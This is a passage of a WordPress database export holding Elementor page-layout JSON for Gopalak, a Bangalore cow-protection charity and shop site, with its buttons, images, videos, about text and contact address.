mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11743,1946,'_elementor_page_assets','a:0:{}'),(11745,1947,'_elementor_edit_mode','builder'),(11746,1947,'_elementor_template_type','wp-page'),(11747,1947,'_elementor_version','3.7.8'),(11748,1947,'_wp_page_template','elementor_canvas'),(11749,1947,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 